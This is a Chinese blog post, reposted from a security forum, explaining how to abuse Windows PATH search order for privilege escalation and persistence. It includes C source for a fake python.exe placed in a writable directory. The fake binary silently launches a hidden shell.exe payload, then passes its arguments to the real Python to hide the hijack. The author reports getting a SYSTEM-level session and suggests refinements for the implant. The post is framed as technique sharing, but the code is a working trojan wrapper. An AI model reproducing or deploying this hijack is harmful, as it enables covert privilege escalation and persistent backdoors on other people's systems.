windows环境变量滥用维权/提权

已于 2023-09-14 10:20:28 修改
阅读量334 收藏
点赞数
分类专栏: web安全 文章标签: 安全 web安全
于 2023-09-14 10:19:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/132870674
版权

本文转载于:https://bbs.zkaq.cn/t/31090.html

0x01 前提

通过滥用系统的路径搜索机制来欺骗高权限用户执行看似合法的系统二进制文件,实际上是恶意的代码或程序,从而导致升权限并执行恶意操作。

攻击的关键前提:

  1. 路径搜索顺序: 当用户在命令行或程序中执行一个命令时,系统会在环境变量$PATH定义的路径列表中搜索要执行的程序。它将从列表中的第一个路径开始搜索,然后按顺序继续搜索,直到找到匹配的程序。
  2. 权限限制: 用户权限的差异是这种攻击的基础。攻击者通常需要两类用户:
    • 低权限用户(M): 拥有较低权限,只能访问和写入特定文件夹,例如c:\temp。
    • 高权限用户: 拥有系统管理员或其他高权限角色,能够执行敏感的系统命令和操作。
  3. 环境变量设置: 攻击者需要控制或能够修改低权限用户(M)的环境变量设置,尤其是$PATH变量。

0x02 原理分析

原理是利用操作系统环境变量设置的弱点来欺骗高权限用户执行恶意代码,从而实现权限提升。

正常情况系统的环境变量是从c:\Windows\system32开始遍历,如下所示:

但是,当存在于环境变量的路径在c:\Windows\system32之前,并且可由低权限用户 (M) 修改的时候,就会造成环境变量的滥用,例如(c:\Windows\temp变量路径滥用):

并且查看文件夹访问权限,是可以用户修改的,查询如下:

  • BUILTIN\Users:内置的用户组 “Users” 有以下权限:(CI):容器内项目,(S):同步访问,(WD):写入数据,(AD):添加数据,(X):执行文件。这意味着”Users”组可以读取、写入、添加、执行该文件夹内的项目。
  • BUILTIN\Administrators:内置的管理员组 “Administrators” 有:(F):完全控制权限。这意味着管理员可以完全控制该文件夹,包括修改权限。
  • NT AUTHORITY\SYSTEM:系统账户有:(F):完全控制权限。这允许系统账户对文件夹拥有完全控制。
  • CREATOR OWNER:文件或文件夹的创建者有:(OI)(CI)(IO)(F):对象的所有权,容器和继承的所有权,对象的访问权限,完全控制权限。这使得文件或文件夹的创建者拥有完全控制权限。
  • SAEDYQJKFJNNOFS\camer:用户”camer”有:(OI)(CI)(F):对象的所有权,容器和继承的所有权,完全控制权限。

当用户将恶意程序放在c:\Windows\temp目录下的时候,正常用户无论是Administrator还是SYSTEM调用,都会优先执行恶意程序,例如劫持的是cmd.exe,如下会被劫持执行计算器,如下所示:

0x03 利用思路

实际利用的时候还存在一个巨大的缺陷,就是系统核心命令使用了一个称为“系统目录优先级”的机制,即使你在环境变量中指定了其他目录,系统仍然会首先搜索系统目录(通常是C:\Windows\system32)中的可执行文件,以确保系统的稳定性和安全性。

所以说只能接劫持利用python、java、gcc等用户环境的环境变量滥用,才能实际利用。

恶意程序如下(劫持的python.exe):

#include <windows.h>
#include <stdio.h>

int main(int argc, char argv[]) {
// 恶意程序
wchar_t Shell = L"C:\Windows\Temp\shell.exe";

HINSTANCE hInstance1 = ShellExecuteW(NULL, L"open", Shell, NULL, NULL, SW_HIDE);

  // 保证python程序能够正常执行
if (argc &gt;= 2) {
    const char* pythonPath = "C:\\Users\\camer\\AppData\\Local\\Programs\\Python\\Python39\\python.exe";

    // 构建调用Python脚本的命令
    char pythonCommand[4096]; // Increased buffer size to accommodate more arguments
    snprintf(pythonCommand, sizeof(pythonCommand), "%s %s", pythonPath, argv[1]);

    // 将额外的参数添加到 Python 命令中
    for (int i = 2; i &lt; argc; ++i) {
        strcat(pythonCommand, " ");
        strcat(pythonCommand, argv[i]);
    }
    // 调用Python脚本
    system(pythonCommand);
}
return 0;

}

假设用户要使用管理员权限执行python文件,调用python执行命令(python文件随便让GPT生成的):

python 1.py greeting morning

执行成功会发现正常运行输出,但是实际后台执行恶意程序并上线成功,并且具有SYSTEM权限的,如下所示:

0x04 思考总结

普通用户权限调用python也会上线,并且最好shell添加防止进程多开的功能,不然后台容易都是马。

zxl2605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows权限维持
qq_40012781的博客
07-03 397
Windows权限维持
提权工具 pr.exe.zip
12-10
"pr.exe" 是一个可能被用作提权工具的可执行文件,它可能包含了特定的漏洞利用代码或者功能,使得攻击者能够在Windows环境中提升他们的权限级别。在Windows系统中,权限通常分为不同等级,如普通用户、管理员等。...
windows系统维权
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-05 122
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限。C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限。sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe" #创建服务。重启win10机器,靶机上线。
Windows5次shift维权漏洞复现
wangyuxiang946的博客
07-26 1万+
Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限除此以外,还可以使用其他工具替换sethc.exe
【QT教程】QT6嵌入式系统设计 QT嵌入式
最新发布
QT界面开发界面美化
05-06 1249
嵌入式系统简介《QT6嵌入式系统设计》正文——嵌入式系统简介嵌入式系统概述嵌入式系统是一种专门为特定任务而设计的计算系统,它不同于通用计算机系统,其设计目标是实现高效、稳定和可靠的特定功能。嵌入式系统通常具备以下特点,专一性,嵌入式系统通常是为了某一特定的应用而设计的,因此它们的功能是专一的。实时性,许多嵌入式系统需要对输入信号做出快速响应,因此实时性是其基本要求之一。资源限制,与通用计算机相比,嵌入式系统往往有更有限的处理器速度、内存和存储资源。封闭性。
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
Linux提权手法总结以及 Linux提权exp集合
02-22
提权,即权限提升,是指非管理员用户获取了系统管理员(root)级别的权限,这通常被视为安全风险。本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的...
CSUACSelfElevation.zip_提权
09-23
在实际开发中,必须谨慎使用提权技术,因为滥用可能会导致安全风险。确保只有在绝对必要的时候才请求额外权限,并且要遵循最小权限原则,以减少潜在的安全漏洞。同时,应遵守微软的开发最佳实践和安全指南,以保证...
windows下的 Nsudo提权工具,支持system权限
02-05
总结,Nsudo是Windows环境下一款强大的提权工具,它为用户提供了灵活且安全的权限提升手段,特别适合于需要高权限操作但又不希望频繁手动获取管理员权限的场合。同时,其开源特性也为开发者提供了宝贵的参考资料。
DVWA通关教程(上)
热门推荐
qq_50854662的博客
05-22 1万+
简介: DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 登录创建数据库(账号为admin,密码为password) 登录后界面 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(暴力破解) Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。
文件上传攻击骚操作
qq_50854662的博客
02-21 6439
文件上传攻击骚操作
Druid未授权漏洞进一步的利用
qq_50854662的博客
05-15 6441
Druid未授权漏洞实战利用思路
sqlmap之绕过安全
qq_50854662的博客
01-05 6036
sqlmap之绕过安全
burp小程序抓包
qq_50854662的博客
02-21 5544
burp小程序抓包
漏扫常见(可验证)漏洞复现方法
qq_50854662的博客
04-21 5159
漏扫常见漏洞复现
通过注册表实现程序开机自启动的方法
qq_50854662的博客
03-28 4599
通过注册表实现程序开机自启动的方法
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4543
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
sourcemap文件泄露漏洞
qq_50854662的博客
04-12 4417
sourcemap文件泄露漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值